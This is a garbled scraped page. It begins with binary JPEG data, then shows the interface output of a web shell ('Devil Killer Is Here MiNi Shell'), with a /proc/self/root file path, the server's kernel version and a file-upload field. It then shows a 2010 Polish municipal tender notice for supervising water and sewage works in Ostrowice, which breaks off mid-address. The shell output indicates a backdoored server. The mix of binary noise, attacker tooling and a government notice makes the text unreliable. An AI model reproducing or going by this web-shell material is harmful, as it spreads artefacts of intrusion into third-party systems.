JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100910/287584-N-2010.html

<p class="kh_header"><b>Ostrowice: Pełnienie funkcji Inżyniera Kontraktu dla zadania:
Uporządkowanie gospodarki wodno- ściekowej na terenie Gminy Ostrowice 
w obszarze Drawskiego Parku Krajobrazowego - Etap II</b><br>
<b>Numer ogłoszenia: 287584 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Ostrowice , 6 6, 78-506 Ostrowice, woj. zachodniopomorskie, tel. 094 3615226 3615252, faks 094 3615227.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu dla zadania:
Uporządkowanie gospodarki wodno- ściekowej na terenie Gminy Ostrowice 
w obszarze Drawskiego Parku Krajobrazowego - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji Inżyniera Kontraktu dla zadania: Uporządkowanie      
gospodarki wodno- ściekowej na terenie Gminy Ostrowice w obszarze  
Drawskiego Parku Krajobrazowego - Etap II
Zakres rzeczowy  pełnienia funkcji Inżyniera Kontraktu na zadaniach:
1.Kanalizacja sanitarna w m. Bolegorzyn wraz z przesyłem do Nowego Worowa: kolektor grawitacyjny PVC O 200 - 514m, przyłącza PVC O 160 
- 19m, kolektor tłoczny PE O 125 - 3905m wraz z rozbiórką i odtworzeniem dróg. 
2.Sieć wodociągowa w m. Przytoń: rurociągi PE O 110 - 1210,20m, PE O 190 - 8,9m, przyłącza wodociągowe O 32 - 137,8m, PE O 40 - 115m wraz 
z rozbiórką i odtworzeniem dróg.
3.Sieć wodociągowa w m. Bolegorzyn: rurociąg PE O 110 - 452,8m, PE O 90 - 356,4m, PE O 63 - 30,5m, przyłącza wodociągowe PE O 32 - 194,1m, PE O 40 - 12,2m wraz z rozbiórką i odtworzeniem dróg
4.Modernizacja Stacji Uzdatniania Wody w m. Bolegorzyn: obejmuje roboty budowlane i konstrukcyjne oraz sanitarne i technologiczne (roboty rozbiórkowe i demontażowe, układ filtracji wody, układ podnoszący ciśnienie, instalacja sprężonego powietrza, pomiaru wody i płukania sieci, robót budowlanych, monitoringu SUW, instalacji elektrycznych i AKPiA).
5.Modernizacja Stacji Uzdatniania Wody w m. Dołgie: obejmuje roboty budowlane i konstrukcyjne oraz sanitarne i technologiczne (roboty rozbiórkowe i demontażowe, układ filtracji wody, układ podnoszący ciśnienie, instalacja sprężonego powietrza, pomiaru wody i płukania sieci, robót budowlanych, monitoringu SUW, instalacji elektrycznych i AKPiA).
6.Modernizacja Stacji Uzdatniania Wody w m. Ostrowice: obejmuje roboty budowlane i konstrukcyjne oraz sanitarne i technologiczne (roboty rozbiórkowe i demontażowe, układ filtracji wody, układ podnoszący ciśnienie, instalacja sprężonego powietrza, pomiaru wody i płukania sieci, robót budowlanych, monitoringu SUW, instalacji elektrycznych i AKPiA).
7.Modernizacja Stacji Uzdatniania Wody w m. Borne: obejmuje roboty budowlane i konstrukcyjne oraz sanitarne i technologiczne (roboty rozbiórkowe i demontażowe, układ filtracji wody, układ podnoszący ciśnienie, instalacja sprężonego powietrza, pomiaru wody i płukania sieci, robót budowlanych, monitoringu SUW, instalacji elektrycznych i AKPiA).
8.Modernizacja Stacji Uzdatniania Wody w m. Siecino: obejmuje roboty budowlane i konstrukcyjne oraz sanitarne i technologiczne (roboty rozbiórkowe i demontażowe, układ filtracji wody, układ podnoszący ciśnienie, instalacja sprężonego powietrza, pomiaru wody i płukania sieci, robót budowlanych, monitoringu SUW, instalacji elektrycznych i AKPiA)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w kwocie 3 000,00 PLN    (trzy tysiące PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał kadrowy.
a) Wykonawca oświadczy, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b)Kluczowy personel Wykonawcy musi posiadać doświadczenie i kwalifikacje zgodnie z wymaganiami przedstawionymi poniżej:

1) Inżynier Rezydent.
	Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	
Wymagane doświadczenie zawodowe:
-doświadczenie zawodowe min. 10 lat, w tym przy realizacji i zarządzaniu co najmniej 2 inwestycjami o wartości robót nie mniejszej niż 5,00 mln PLN każda, współfinansowanymi ze środków Unii Europejskiej na stanowisku Inżynier Kontraktu lub Inżynier Rezydent. 

2) Inspektor Robót Instalacyjnych Sanitarnych:
	
Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i  urządzeń cieplnych, wentylacyjnych, gazowych, bez ograniczeń  (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania robotami budowlanymi co najmniej w zakresie instalacjii urządzeń, cieplnych i gazowych wentylacyjnych)
wraz z przynależnością do właściwej izby samorządu zawodowego.
Wymagane doświadczenie zawodowe:
-nie mniej niż. 5-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót, w tym minimum 2 zadań z zakresu gospodarki wodno - ściekowej 
o wartości robót nie mniejszej niż 5,00 mln PLN każda.

3)Inspektor Robót Elektrycznych: 

Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	-	uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania robotami budowlanymi w co najmniej zakresie instalacji i sieci elektrycznych wraz z przynależnością do właściwej izby samorządu zawodowego
Wymagane doświadczenie zawodowe:
-nie mniej niż. 5-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót elektrycznych, w tym minimum 2 zadań z zakresu gospodarki wodno
- ściekowej o wartości robót nie mniejszej niż 5,00 mln PLN każda.

5)Inspektor Robót Drogowych: 

Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	-	uprawnienia do kierowania robotami w specjalności drogowej bez ograniczeń wraz z przynależnością do właściwej izby samorządu zawodowego

Wymagane doświadczenie zawodowe:
-nie mniej niż. 5-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót drogowych, w tym minimum 2 zadań obejmujących budowę lub przebudowę dróg.

6)	Specjalista ds. rozliczeń: 

Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne lub  ekonomiczne.
	
Wymagane doświadczenie zawodowe:
-	nie mniej niż. 5-letnie doświadczenie zawodowe w rozliczaniu zadań, w tym min. 
1 zadanie o wartości robót min. 5,00 mln PLN, współfinansowane ze środków unijnych

6.2.3.	Doświadczenie Wykonawcy 
a)	Wykonawca musi wykazać, że w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z należytą starannością realizację co najmniej:
-	2 usług w zakresie pełnienia funkcji Inżyniera Kontraktu na zadaniach z zakresu gospodarki wodno - ściekowej współfinansowanych ze środków Unii Europejskiej o wartości robót minimum 5,00 mln PLN każde.

b)	Warunek wymieniony, w pkt. a) musi zostać spełniony łącznie przez wszystkich Wykonawców wspólnie ubiegających się o zamówienie. 
6.2.4 Ocena spełnienia warunków udziału w postępowaniu.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu porównując przedstawione w ofercie dokumenty z warunkami udziału w postępowaniu na zasadzie spełnia-nie spełnia

6.3. 	Wykonawcy wspólnie ubiegający się o zamówienie 
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia, zobowiązani są: 
 a)	do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
 b)	spełniać warunki wymienione w punkcie 6 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał kadrowy.
a) Wykonawca oświadczy, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b)Kluczowy personel Wykonawcy musi posiadać doświadczenie i kwalifikacje zgodnie 
z wymaganiami przedstawionymi poniżej:

1) 	Inżynier Rezydent.
	Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	
Wymagane doświadczenie zawodowe:
-	doświadczenie zawodowe min. 10 lat, w tym przy realizacji i zarządzaniu co najmniej 2 inwestycjami o wartości robót nie mniejszej niż 5,00 mln PLN każda, współfinansowanymi ze środków Unii Europejskiej na stanowisku Inżynier Kontraktu lub Inżynier Rezydent. 

2) 	Inspektor Robót Instalacyjnych Sanitarnych:
	
Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i  urządzeń cieplnych, wentylacyjnych, gazowych, bez ograniczeń  (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania robotami budowlanymi co najmniej 
w zakresie instalacji i urządzeń, cieplnych i gazowych wentylacyjnych) wraz 
z przynależnością do właściwej izby samorządu zawodowego.

Wymagane doświadczenie zawodowe:
-	nie mniej niż. 5-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót, w tym minimum 2 zadań z zakresu gospodarki wodno - ściekowej 
o wartości robót nie mniejszej niż 5,00 mln PLN każda.

3)	Inspektor Robót Elektrycznych: 

Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	-	uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania robotami budowlanymi w co najmniej zakresie instalacji i sieci elektrycznych wraz 
z przynależnością do właściwej izby samorządu zawodowego.

Wymagane doświadczenie zawodowe:
-	nie mniej niż. 5-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót elektrycznych, w tym minimum 2 zadań z zakresu gospodarki wodno
- ściekowej o wartości robót nie mniejszej niż 5,00 mln PLN każda.

5)	Inspektor Robót Drogowych: 

Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne.
	-	uprawnienia do kierowania robotami w specjalności drogowej bez ograniczeń wraz 
z przynależnością do właściwej izby samorządu zawodowego.

Wymagane doświadczenie zawodowe:
-	nie mniej niż. 5-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót drogowych, w tym minimum 2 zadań obejmujących budowę lub przebudowę dróg.

6)	Specjalista ds. rozliczeń: 

Wymagane kwalifikacje:
	- 	wykształcenie wyższe techniczne lub  ekonomiczne.
	
Wymagane doświadczenie zawodowe:
-	nie mniej niż. 5-letnie doświadczenie zawodowe w rozliczaniu zadań, w tym min. 
1 zadanie o wartości robót min. 5,00 mln PLN, współfinansowane ze środków unijnych

6.2.3.	Doświadczenie Wykonawcy 
a)	Wykonawca musi wykazać, że w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z należytą starannością realizację co najmniej:
-	2 usług w zakresie pełnienia funkcji Inżyniera Kontraktu na zadaniach z zakresu gospodarki wodno - ściekowej współfinansowanych ze środków Unii Europejskiej o wartości robót minimum 5,00 mln PLN każde.

b)Warunek wymieniony, w pkt. a) musi zostać spełniony łącznie przez wszystkich Wykonawców wspólnie ubiegających się o zamówienie. 
6.2.4 Ocena spełnienia warunków udziału w postępowaniu.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu porównując przedstawione w ofercie dokumenty z warunkami udziału w postępowaniu na zasadzie spełnia-nie spełnia

6.3. Wykonawcy wspólnie ubiegający się o zamówienie 
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia, zobowiązani są: 
 a)do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
 b)spełniać warunki wymienione w punkcie 6 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca osiągnął w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, średni roczny przychód netto ze sprzedaży w wysokości co najmniej 3.000.000,00 PLN.

W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć rachunek zysków i strat, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty,

b)posiadać środki finansowe w wysokości co najmniej 500.000 PLN lub posiadać zdolność kredytową w wysokości co najmniej 500.000 PLN. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym posiadają rachunek bankowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert 

c)posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 10.000.000 PLN. W celu potwierdzenia niniejszego warunku Wykonawca musi złożyć opłaconą polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

W przypadku Wykonawców składających wspólną ofertę warunki ekonomiczno-finansowe powinny być spełnione łącznie przez wszystkich Wykonawców składających wspólną ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ostrowice
Ostrowice nr 6
